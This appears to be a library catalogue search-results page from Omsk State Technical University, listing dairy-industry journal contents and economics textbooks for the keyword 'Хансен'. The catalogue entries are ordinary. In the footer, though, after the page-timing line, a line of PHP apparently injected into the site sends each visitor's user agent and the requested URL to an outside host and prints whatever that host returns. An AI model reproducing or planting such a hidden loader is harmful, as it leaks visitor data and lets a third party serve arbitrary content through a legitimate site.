Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

116 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Хансен")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 9
1. 
Молочная промышленность. - Журнал, 2011г. № 12
Оглавление 
  • Традиции и качество - выбор Звениговского комбината. - с.81-82
  • Акцент на качество и безопасность: семинар в Республике Марий Эл. - с.79-80
  • Хакимова, Ш. И. Кисломолочный напиток "Шифо" / Ш. И. Хакимова, Д. Э. Джахангирова. - с.78
  • Гаврилова, Н. Б. Кисломолочный продукт для геродиетического питания / Н. Б. Гаврилова, Н. В. Данилова. - с.77
  • Гнездилова, А. И. Консервированный молокосодержащий продукт с сахаром / А. И. Гнездилова, Ю. В. Виноградова, А. В. Музыкантова. - с.76
  • Храмцов, А. Г. Сухой бифидогенный концентрат на основе молочной сыворотки и сои / А. Г. Храмцов, Д. Г. Бурцев. - с.75
  • Пашина, Е. Ю. Низколактозные напитки из белково-углеводного сырья / Е. Ю. Пашина, А. Г. Храмцов, А. Д. Лодыгин. - с.73-74
  • Бабич, О. О. Биологически активные ферментативные гидролизаты / О. О. Бабич, О. В. Козлова. - с.71-72
  • Крючкова, В. В. Обогащенный кисломолочный напиток / В. В. Крючкова, Л. А. Лисовицкая, Н. П. Фалынскова. - с.70
  • Райчева, Е. Ю. Семинар компании "БК Джюлини" во Франции / Е. Ю. Райчева. - с.66-69
  • Мельникова, Е. И. Йогурт с синбиотическими свойствами / Е. И. Мельникова, А. Н. Пономарев, М. О. Ширунов. - с.64-65
  • Методы ДНК-технологии для идентификации растительного сырья в молочных продуктах. - с.62-63
  • Молочный напиток с органическим йодом. - с.60-61
  • Ананьева, Н. В. "Христиан Хансен" создает экопродукты для здорового питания / Н. В. Ананьева. - с.56-58
  • Кулев, Д. Х. Национальные стандарты на пищевые добавки / Д. Х. Кулев, А. В. Изотова. - с.55
  • Иванова, И. Е. Влияние базидиальных грибов на пробиотические культуры / И. Е. Иванова. - с.54
  • Фатьянов, Е. В. Влияние водных растворов углеводов на активность воды / Е. В. Фатьянов, Р. Е. Те, И. В. Царьков. - с.52-53
  • Остроумов, Л. А. Активность воды в структурированных молочных продуктах / Л. А. Остроумов, А. Н. Архипов. - с.50-51
  • Шидловская, В. П. Антиоксидантная активность ферментов / В. П. Шидловская, Е. А. Юрова. - с.48-49
  • Беликова, И. HOLDBACтм - решение для производства ферментированных продуктов высокого качества / И. Беликова. - с.46
  • Бактерицидные свойства бифидобактерий для увеличения сроков годности кисломолочных продуктов. - с.45
  • В помощь микробиологу. - с.44
  • Ананьева, Н. В. Современные технологии водоподготовки и защиты оборудования от коррозии и накипеобразования / Н. В. Ананьева. - с.42-43
  • Ананьева, Н. В. Комплексная переработка молочного сырья / Н. В. Ананьева. - с.36-41
  • "МЕГА ПрофиЛайн". Подводя итоги года. - с.35
  • Быковская, Г. В. "ФрутоНяня" - помощь маме! / Г. В. Быковская. - с.31-32
  • Привести в восторг детей и покорить родителей. Маркетинг детских продуктов. - с.28-30
  • Спицын, А. Комплексный анализ качества - сохраняя лучшее / А. Спицын. - с.27
  • Ковалевский, Д. Н. Производство творога на мембранной установке компании "ЛЭФ" / Д. Н. Ковалевский, В. А. Лялин. - с.26
  • Шальк, Г. Эффективные процессы на мысе Доброй Надежды / Г. Шальк, М. Полыновская. - с.24-25
  • Дунченко, Н. И. Управление безопасностью на основе системы прослеживаемости / Н. И. Дунченко, Л. П. Бессонова. - с.21-23
  • Махова, Н. Н. Внутренний аудит систем менеджмента безопасности / Н. Н. Махова. - с.18-20
  • Шепелева, Е. В. Методика оценки рисков безопасности молочной продукции / Е. В. Шепелева, Е. В. Митасева, А. С. Ремизова. - с.14-17
  • Боровицкий, М. В. Молочное животноводство Ярославской области / М. В. Боровицкий. - с.12-13
  • Бушуева, И. Г. Италия, Парма: саммит ММФ / И. Г. Бушуева. - с.8-10
  • Горощенко, Л. Г. Импорт и экспорт молочной продукции (коды ТН ВЭД 04. 02 и ТН ВЭД 04. 03) / Л. Г. Горощенко. - с.5-7
2. 
Молочная промышленность. - Журнал, 2012г. № 4
Оглавление 
  • Просеков, А. Ю. Особенности удаления гистидина из казеина / А. Ю. Просеков, Г. В. Борисова, О. В. Бессонова. - с.76-77
  • Снижение аллергенных свойств белков молока. Технологические подходы. - с.73-75
  • Ключников, А. И. Мембранные системы и инжиниринг при переработке молочного сырья / А. И. Ключников, А. Н. Пономарев, К. К. Полянский. - с.71-72
  • Баранов, С. А. Потенциал снижения энергозатрат в установках мембранной фильтрации / С. А. Баранов. - с.70
  • Волкова, Т. А. О роли продуктов из сыворотки / Т. А. Волкова. - с.69
  • Вопросы гигиены в производстве творога. - с.68
  • Пряничникова, Н. С. Творожные продукты здорового питания / Н. С. Пряничникова. - с.67
  • Липатрия, И. С. Совершенствование творожного продукта / И. С. Липатрия. - с.64-66
  • Полуавтоматическая поточная линия производства творога. - с.63
  • Фриденберг, Г. В. Тенденции в производстве творога / Г. В. Фриденберг. - с.60-62
  • Мальцев, Н. В. Современное производство творога / Н. В. Мальцев. - с.58-59
  • Русских, В. М. Автоматизированная линия производства творога закрытым способом А-ТЛ. Базовое оборудование / В. М. Русских. - с.56-57
  • Миклух, И. В. Нормализация молока и молочных продуктов по белку / И. В. Миклух, О. В. Дымар. - с.54-55
  • Зенина, Д. В. Увеличение выхода традиционного творога / Д. В. Зенина. - с.53
  • Клепкер, В. М. Пути развития производства творога / В. М. Клепкер. - с.52
  • Соколова, О. М. Заквасочные культуры компании "Христиан Хансен" для производства сметаны / О. М. Соколова. - с.50-51
  • Применение дигидрокверцетина для увеличения срока годности молока. - с.48-49
  • Новинка от "Бифилайф". - с.47
  • Чиркин, В. А. Анализ качества молока по аминокислотному и витаминному составу / В. А. Чиркин, Н. И. Шумской, К. К. Полянский. - с.45-46
  • Шидловская, В. П. К вопросу о содержинии мочевины в молоке и методах ее определения / В. П. Шидловская, Е. А. Юрова. - с.42-44
  • Вишневская, Е. Новые возможности вашего производства / Е. Вишневская. - с.40
  • Зарубо, Д. М. "Карачевмолпром": вчера, сегодня, завтра / Д. М. Зарубо. - с.36-39
  • Генеральный конструктор. - с.33-34
  • Новый высокопроизводительный автомат для упаковки в "Пюр-Пак" от "Таурас-Феникс". - с.31
  • Макеева, И. А. Новейшие изменения в Федеральный закон "О техническом регулировании" / И. А. Макеева, Ж. И. Смирнова. - с.28-29
  • Макеева, И. А. Новое в законодательных и нормативных документах / И. А. Макеева, Н. В. Стратонова, З. Ю. Малинина. - с.26-27
  • Шепелева, Е. В. Таможенный союз: подтверждение соответствия молочной продукции / Е. В. Шепелева. - с.21-24
  • Кузин, В. С. Нормативно-правовое регулирование перемещения товаров, подлежащих ветеринарному контролю (надзору), на таможенной границе и таможенной территории Таможенного союза: молоко и молочная продукция / В. С. Кузин. - с.14-20
  • Таможенный союз: формирование нормативной базы. - с.5-12
  • Награды X Международной выставки "Молочная и мясная индустрия". - с.4
3. 
Молочная промышленность. - Журнал, 2012г. № 5
Оглавление 
  • Жданов, А. А. На встречу в Еврозону / А. А. Жданов. - с.84-85
  • Бушуева, И. Г. Семинар Ehrmann: современные технологии и инновационные продукты в молочном животноводстве / И. Г. Бушуева. - с.81-85
  • Хайруллин, А. Н. Основные проблемы молочного животноводства России: пути решения / А. Н. Хайруллин. - с.75-80
  • Двинский, Б. М. Молочная отрасль России - уроки истории / Б. М. Двинский. - с.69-74
  • Бушуева, И. Г. III съезд "СОЮЗМОЛОКО" / И. Г. Бушуева. - с.65-68
  • Двинский, Б. М. Молочная индустрия - 2012 / Б. М. Двинский, О. А. Гиринович. - с.56-64
  • Наджар, А. Вспомогательные инструменты при взаимодействии с иностранными поставщиками оборудования / А. Наджар. - с.54
  • Поздравляем с юбилеем Рустама Рашидовича Алиева, генерального директора ОАО "Молоко" (Калининградская область). - с.52-53
  • Иванова, С. В. Молочный подкомплекс России: последствия присоединения к ВТО / С. В. Иванова. - с.49-51
  • Рощупкина, Н. В. Производство мороженого: влияние жировой основы / Н. В. Рощупкина, Е. Г. Рогожкина, А. В. Предыбайло. - с.48
  • Зенина, Д. В. Современные тенденции в повышении качества традиционного творога / Д. В. Зенина. - с.46-47
  • Зобкова, З. С. Продовольственная безопасность России: один из главных путей - самообеспеченность цельномолочными продуктами / З. С. Зобкова. - с.40-44
  • Угрюмова, Е. Дезинфекция воздуха на молочном заводе / Е. Угрюмова. - с.38
  • Соколов, Д. М. Экспресс-контроль гигиены на производстве / Д. М. Соколов, М. С. Соколов. - с.36-37
  • Наумова, Н. Л. Потребительские предпочтения при выборе молочных продуктов / Н. Л. Наумова. - с.34-35
  • Поздравляем с юбилеем Сергея Умалатовича Гусейнова, генерального директора Гиагинского молочного завода. - с.33
  • Тарасова, Е. Ю. Многокомпонентный ферментированный продукт / Е. Ю. Тарасова, С. Л. Галкина. - с.32-33
  • Рогожина, Т. Н. Пробиотические культуры и биологически активные белки молока. Новый функциональный комплексный компонент / Т. Н. Рогожина, В. И. Ганина, Г. С. Комолова. - с.30-31
  • CheaslyFC-PC - концепция производства свежих ферментированных молочных продуктов от компании SPX. - с.29
  • Келяшова, Ю. Н. Применение ферментов и культур DVS компании "Хр. Хансен" - гарантия улучшения качества и увеличения выхода сыров / Ю. Н. Келяшова. - с.26-27
  • Бережная упаковка зерненого творога в пакет-подушку на автомате "Питпак МЖТ". - с.25
  • Бурыкин, А. И. Поверхностное натяжение молочных продуктов / А. И. Бурыкин. - с.22-23
  • Демин, И. Снижение складских затрат за счет сокращения времени обработки заказов / И. Демин, Г. Шальк. - с.20-21
  • Макеева, И. А. Техническая документация по закону "О техническом регулировании" / И. А. Макеева, Н. В. Стратонова, Ю. Н. Берновский. - с.17-19
  • Бабина, Т. А. Аттестация рабочих мест по условиям труда / Т. А. Бабина. - с.13-15
  • Алексеева, Е. А. Североморский молочный завод: слагаемые успеха / Е. А. Алексеева. - с.10-12
  • Переработка молока в летний период и продвижение продукции - главные вопросы на повестке дня. - с.8
  • Сидоров, В. Н. Республика Мордовия. Состояние молочной отрасли / В. Н. Сидоров. - с.7
  • Горощенко, Л. Г. Динамика развития российского производства молочных продуктов / Л. Г. Горощенко. - с.5-6
4. 
Молочная промышленность. - Журнал, 2011г. № 7
Оглавление 
  • Просеков, А. Ю. Гелеобразные продукты с использованием сыворотки и растительного сырья / А. Ю. Просеков, И. С. Разумникова, Г. В. Менх. - с.78
  • Овчинникова, О. Е. Свойства гидролизатов B-лактоглобулина коровьего молока / О. Е. Овчинникова, Н. В. Ананьева, М. И. Губанова. - с.76-77
  • Прошкина, Т. Г. Протеолитические свойства сырого молока / Т. Г. Прошкина, А. Н. Белов, Е. В. Шалимова. - с.75
  • Нимацыренова, Л. Г. Белки, содержащие связанную форму селена / Л. Г. Нимацыренова, С. Д. Жамсаранова, М. Пишетшридер. - с.73-74
  • Зобкова, З. С. Антимикробные свойства олигопептидов лактоферрина / З. С. Зобкова, Д. В. Зенина. - с.72
  • Лактоферрин коровьего молока. - с.70-71
  • Огнева, О. А. Молоко как микроэкосистема / О. А. Огнева. - с.68-69
  • Степанянц, М. Г. Семинар в Белоруссии: За инновациями на "Савушкин продукт" / М. Г. Степанянц. - с.63-66
  • Гиринович, О. А. Семинар "ЭФКО" в Анапе: молокосодержащие продукты в новом ракурсе / О. А. Гиринович. - с.59-62
  • Лампадова, Е. Поколение будущего - "Поколение Милк" / Е. Лампадова. - с.58
  • Ананьева, Н. В. Управление безопасностью и качеством продукции / Н. В. Ананьева. - с.56-57
  • Махова, Н. Н. Интегрирование требований экологических стандартов в системы менеджмента безопасности пищевой продукции / Н. Н. Махова. - с.54-55
  • Крикун, Т. И. О разработке технических регламентов на пищевую продукцию / Т. И. Крикун. - с.52-53
  • Дуплексные системы механической очистки трубопроводов. - с.50-51
  • Совершенствование управления ремонтами. - с.49
  • Межкристаллитная коррозия оборудования. - с.47-49
  • Боков, Н. Обнаружение микротрещин в пластинах теплообменников / Н. Боков. - с.46
  • Прокопенко, Г. В. Генератор ледяной воды - это льдоаккумулятор со встроенной холодильной установкой / Г. В. Прокопенко. - с.45
  • Карманович, В. И. К вопросу повышения энергоэффективности молокоперерабатывающих производств / В. И. Карманович, В. Л. Елистратов, О. А. Прудовская. - с.43-44
  • Верхоломов, Е. И. Высокоэффективные молочные фильтры UVMILKR / Е. И. Верхоломов. - с.40
  • Управление качеством на молочном предприятии. CSB-System AG предлагает интегрированный лабораторный учет. - с.39
  • Консервы на молочной основе с полной заменой молочного жира на растительный. - с.35-36
  • Козырев, Д. И. Заменитель молочного жира в творожных продуктах / Д. И. Козырев. - с.34
  • Натуральные ингредиенты компании "СОЮЗОПТТОРГ" - решения для молочной отрасли. - с.32
  • Влияние режимов обработки молока на белковый состав творога с функциональными свойствами. - с.30-31
  • Зобкова, З. С. Новое в производстве творога / З. С. Зобкова, Д. В. Зенина. - с.29
  • Агаркова, Е. Ю. Разработки ВНИМИ: технологии молочных продуктов на основе баромембранных методов / Е. Ю. Агаркова, Г. В. Фриденберг. - с.28-29
  • Куликова, Т. В. Производство творога - традиционный подход и инновации от компании "Христиан Хансен" / Т. В. Куликова. - с.26-27
  • Инновационный продукт - молоко с повышенным содержанием мелатонина. - с.24-25
  • Новости от "Бифилайф". - с.23
  • Страничка технолога. - с.22
  • Разгуляев, В. Ю. Оптимизация поштучной сборки товара на складе / В. Ю. Разгуляев. - с.18-21
  • Проект Технического регламента Таможенного союза "О безопасности упаковки". - с.16-17
  • Биоразлагаемая упаковка для йогуртов. - с.14-15
  • Быковская, Г. В. Картонная бутылка для молока: в чем инновации / Г. В. Быковская. - с.12-13
  • Горковцов, А. В. Современные тренды дизайна в упаковке молочных продуктов / А. В. Горковцов. - с.10-11
  • Молочная "Избенка". - с.8
  • Бритвина, Т. П. Сохраняем традиции - думаем о будущем / Т. П. Бритвина, Л. Н. Малек. - с.6-7
  • Афанасьева, Л. В. Роль брендинга в продвижении молочной продукции / Л. В. Афанасьева. - с.5
5. 
Молочная промышленность. - Журнал, 2011г. № 3
Оглавление 
  • Двинский, Б. М. "Молочный хозяин - 2010" / Б. М. Двинский. - с.85
  • Дубова, Е. А. Определение хранимоспособности сухого обезжиренного молока / Е. А. Дубова, Л. А. Буйлова, В. Б. Кузнецов. - с.84
  • Гнездилова, А. И. Охлаждение сгущенных молочных и молокосодержащих консервов с сахаром / А. И. Гнездилова, Ю. В. Виноградова, В. В. Червецов. - с.83
  • Бурлев, М. Я. Предотвращение потерь сухого молока при бункерном хранении / М. Я. Бурлев. - с.82
  • Курчикова, В. С. Как часто вас беспокоит вопрос о ремонте полов на вашем производстве? / В. С. Курчикова. - с.80
  • Зобкова, З. С. Влияние энзимов на реологические характеристики кисломолочных продуктов / З. С. Зобкова, Д. В. Зенина, О. А. Трубникова. - с.79
  • Ельчанинов, В. В. Современные представления о структуре казеиновой мицеллы / В. В. Ельчанинов. - с.77-78
  • Памяти профессора М. С. Уманского. - с.76
  • Мигунова, О. Санитарно-гигиеническая обработка при производстве копченых сыров ДМ ФОМ С ЭКСТРА и БИО СИД С / О. Мигунова. - с.74
  • Пономарев, А. Н. Обогащенный творог / А. Н. Пономарев, А. А. Мерзликина, Л. В. Голубева. - с.73
  • Грунская, В. А. Стойкость эмульсий немолочных жиров / В. А. Грунская, Я. В. Корзюк. - с.72
  • Ипатова, Л. Г. Применение фитостеринов в жировых продуктах / Л. Г. Ипатова, А. А. Кочеткова. - с.70-71
  • Зайцева, Л. В. Новая эра: заменители молочного жира по ГОСТу / Л. В. Зайцева. - с.68-69
  • Кисломолочный биопродукт "Бифилайф" в массовом питании школьников. - с.67
  • "Молочные продукты - наши друзья по жизни". - с.64-65
  • Соколова, О. М. Ингредиенты "Христиан Хансен" - оптимальные затраты и гарантия качества вашего сыра / О. М. Соколова. - с.62-63
  • Белов, В. В. Качество стабилизационных систем / В. В. Белов. - с.60
  • Страничка технолога. - с.58
  • Заквасочные культуры и функциональные системы для кисломолочных продуктов. - с.56
  • Актуальное решение в области микробиологического контроля. - с.55
  • В помощь микробиологу. - с.54
  • Комплексные решения от "Русской Трапезы". - с.52
  • Румянцева, М. Н. Модернизация на заводе "Бишкексут" / М. Н. Румянцева. - с.50-51
  • Разлить молоко? Расфасовать творог? Легко с оборудованием "Тарас-Феникс"!. - с.49
  • Компактная и легкая в эксплуатации: новая серия машин от компании "ОЙСТАР Хассия". - с.46
  • Шверманн, С. Производство молока с увеличенным сроком хранения (ESL). Технологические решения / С. Шверманн, У. Швенцов. - с.43-45
  • Гуща, Ю. М. Инновационные решения компании "Протемол" в оборудовании и технологии / Ю. М. Гуща. - с.41-42
  • Космин, А. Новый шаг в автоматизации молочного производства / А. Космин. - с.39-40
  • Макеева, И. А. Разработка технических документов на продукты, исключенные из технического регламента на молоко и молочную продукцию / И. А. Макеева, Д. Е. Генова, З. Ю. Малинина. - с.35-36
  • Крикун, Т. И. Проблемы совместимости требований национального законодательства и нормативной базы Таможенного союза / Т. И. Крикун. - с.33-34
  • Безработица и инфляция не добавляют уверенности. - с.30
  • Сорокина, Т. И. Резервы роста продаж - 2011 / Т. И. Сорокина. - с.28-29
  • Отечественный молочный рынок и ценообразование на сырое молоко: состояние и перспективы. - с.26-27
  • Игонькин, А. В. Саратовская область / А. В. Игонькин. - с.23-25
  • Курзанов, А. А. Омская область / А. А. Курзанов. - с.21-22
  • Морозов, А. И. Нижегородская область / А. И. Морозов. - с.18-19
  • Горохова, Л. А. Кострома молочная / Л. А. Горохова. - с.16-17
  • Прибор для определения упругости сыра компании Stable Micro Systems. - с.15
  • Котлячков, А. А. Кировская область / А. А. Котлячков. - с.13-14
  • Коваленко, Н. А. Республика Башкортостан / Н. А. Коваленко. - с.11-12
  • Колончин, К. В. Развитие сырьевой базы - ключевой фактор роста производства в молочной промышленности России / К. В. Колончин. - с.6-10
6. 
Березин, Игорь Станиславович. Краткая история экономической мысли [Текст] : Учеб. пособие / И. С. Березин, 2000. - 366 с.
Ключевые слова 
Учебник и пособие -- Экономическая мысль -- История экономической мысли -- Экономическая политика -- Экономическая теория -- Ликург -- Солон -- Магон -- Ксенофонт -- Платон -- Аристотель -- Катон старший -- Варрон -- Цицерон -- Сенека -- Колумелла -- Юстиниан -- Аквинский -- Ибн хальдун -- Паччиоли -- Петти -- Граунт -- Кенэ -- Тюрго -- Смит -- Рикардо -- Мальтус -- Сэй -- Милль -- Маркс -- Энгельс -- Бернштейн -- Каутский -- Плеханов -- Туган-барановский -- Менгер -- Визер -- Бем-баверк -- Викселль -- Маршалл -- Пигу -- Кларк -- чемберлен -- Шумпеттер -- Леонтьев -- Веблен -- Митчелл -- Коммонс -- Чаянов -- Кондратьев -- Юровский -- Кейнс -- Робинсон -- Хансен -- Хикс -- Самуэльсон -- Мизес -- Хайек -- Ойкен -- Эрхард -- Фридман -- Мюрдаль -- Гэлбрейт -- Перру -- Тоффлер -- Белл -- Ростоу -- Бьюкенен -- Коуз -- Беккер
Держатели документа (Информация об экземплярах) 
7. 
История экономических учений [Текст] : учеб. для вузов по направлению "Экономика" / А. С. Квасов [и др.] ; под ред. А. С. Квасова, 2011. - 495 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- ЭКОНОМИЧЕСКОЕ -- УЧЕНИЕ -- НАУКА -- ДРЕВНИЙ МИР -- СРЕДНЕВЕКОВЬЕ -- МЕРКАНТИЛИЗМ -- КЛАССИЧЕСКАЯ -- ПОЛИТИЧЕСКАЯ -- ЭКОНОМИЯ -- ПОЛИТЭКОНОМИЯ -- ТЕОРИЯ -- ЗАПАДНАЯ ЕВРОПА -- СОЦИАЛИЗМ -- УТОПИЧЕСКИЙ -- СОЦИАЛИСТ-УТОПИСТ -- УТОПИСТ -- ФРАНЦУЗСКИЙ -- ФРАНЦИЯ -- ГЕРМАНИЯ -- МАРКС -- ПЕТТИ -- БУАГИЛЬБЕР -- СМИТ -- РИКАРДО -- СЭЙ -- МАЛЬТУС -- МИЛЛЬ -- МАРЖИНАЛИЗМ -- НЕОКЛАССИКА -- ХИКС -- КЕЙНС -- ХАНСЕН -- НЕОКЕЙНСИАНСТВО -- ХАРРОД -- ПОСТКЕЙНСИАНСТВО -- НЕОЛИБЕРАЛИЗМ -- НЕОКОНСЕРВАТИЗМ -- ИНСТИТУЦИОНАЛИЗМ -- ТРАДИЦИОННЫЙ -- НЕОИНСТИТУЦИОНАЛИЗМ -- РОССИЯ -- ПЕРЕСВЕТОВ -- ПОЛИТИКА -- ПЕТР I -- ЕКАТЕРИНА II -- НАПРАВЛЕНИЕ -- ОФИЦИАЛЬНОЕ -- РЕВОЛЮЦИОННОЕ -- СССР -- СОВЕТСКАЯ -- ЭКОНОМИКА -- РЫНОЧНАЯ
Держатели документа (Информация об экземплярах) 

Рассматриваются важнейшие экономические идеи и концепции, выработанные человечеством с древнейших времен до современности. В центре внимания экономические учения Запада и России, в том числе состояние экономической мысли в Советском Союзе и постсоветской России.

Овладение материалом учебника позволяет проследить связь экономической теории с хозяйственной практикой, критически относиться к предлагаемым вариантам экономической политики и тщательно их анализировать, видеть возможные последствия политико-экономических решений и выбирать оптимальную экономическую стратегию и тактику.

Для студентов, обучающихся по экономическим специальностям, аспирантов, преподавателей, а также широкого круга читателей, интересующихся вопросами развития мировой и отечественной экономической мысли.

8. 
Молочная промышленность. - Журнал, 2011г. № 1
Оглавление 
  • Радаева, И. А. Николай Никитович Липатов (1923-1994) / И. А. Радаева. - с.72-73
  • Карликова, Г. Г. Влияние упитанности коров в сухостойный период на свойства молока / Г. Г. Карликова, О. В. Москвичева, Н. Д. Дроздов. - с.64
  • Разумникова, И. С. Перспективы использования молока трансгенных животных / И. С. Разумникова, Е. В. Короткая, А. Ю. Просеков. - с.62-63
  • Жданов, А. А. ЗАПАД и ВОСТОК: сближаемся или отдаляемся? / А. А. Жданов. - с.60-61
  • Двинский, Б. М. Международная выставка "Пищевые ингредиенты, добавки и пряности" / Б. М. Двинский. - с.54-59
  • Рыбалова, Т. И. Пока не догнать, не перегнать... / Т. И. Рыбалова. - с.50
  • Вышемирский, Ф. А. Пахта как "обезжиренные сливки" / Ф. А. Вышемирский. - с.49
  • Строение оболочки жировых шариков. - с.48-49
  • Эффективный способ переработки творожной сыворотки. - с.45-46
  • Кисломолочный биопродукт "Бифилайф" в массовом питании школьников. - с.43
  • Страничка технолога. - с.42
  • Соколов, Д. М. Биолюминесцентный метод экспресс-контроля гигиены на производстве / Д. М. Соколов, И. В. Кашинцев, М. С. Соколов. - с.39-41
  • В помощь микробиологу. - с.38
  • Соколова, О. М. Заквасочные культуры компании "Христиан Хансен" для традиционных кисломолочных продуктов / О. М. Соколова. - с.36-37
  • Бушуева, И. Г. Год спустя: технохимический контроль на молочных предприятиях / И. Г. Бушуева. - с.34
  • Поляк, А. Л. Рынок сухого молока и масла. Обзор и прогноз 2010-2011 гг. / А. Л. Поляк. - с.28-32
  • Смирнов, Е. В. Европейский регламент по ароматизаторам / Е. В. Смирнов. - с.24-26
  • Нечаев, А. П. Техническое регулирование в области пищевых добавок и ароматизаторов / А. П. Нечаев, Т. В. Коткова. - с.21-23
  • Крикун, Т. И. Проблемы совместимости требований национального законодательства и нормативной базы Таможенного союза / Т. И. Крикун. - с.19-20
  • "Молинформ" вновь собирает молочников. - с.18
  • Перспектива всегда там, где умеют видеть будущее. - с.16-18
  • Мониторинг продовольственных товаров в торговых организациях Санкт-Петербурга. - с.14-15
  • Кузлякин, А. К. Государственные закупки в Казахстане / А. К. Кузлякин, А. Я. Баймурзина. - с.12-13
  • Лесных, О. В. Учет операций по возврату молочной продукции от покупателей / О. В. Лесных. - с.8-11
  • Нижегородцев, Т. В. Мониторинг Закона о торговле / Т. В. Нижегородцев. - с.7
  • Ананьева, Н. В. Совершенствование Закона о торговле / Н. В. Ананьева. - с.4-6
9. 
История экономических учений (современный этап) [Текст] : Учеб. для экон. специальностей / А. Г. Худокормов, П. А. Отмахов, В. С. Афанасьев, 1999. - 733 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2997 - 24.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.18 с.24 запросов, 0.79c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;